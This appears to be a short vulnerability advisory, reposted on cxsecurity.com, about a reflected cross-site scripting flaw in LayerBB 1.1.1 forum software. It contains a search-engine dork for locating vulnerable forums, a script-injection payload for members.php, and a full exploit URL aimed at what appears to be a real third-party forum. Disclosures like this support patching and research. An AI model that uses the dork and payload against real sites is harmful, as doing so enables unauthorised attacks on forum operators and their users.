LayerBB 1.1.1 XSS Vulnerability

2019.02.18
dz indoushka (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : LayerBB 1.1.1 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : http://layerbb.com/ | | # Dork : "Powered by LayerBB 1.1.1" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : members.php/cmd/user/id/1'"()%26%25<acx><script>alert(/indoushka/);</script> [+] https://blendinproject.eu/forum_1/members.php/cmd/user/id/1'%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top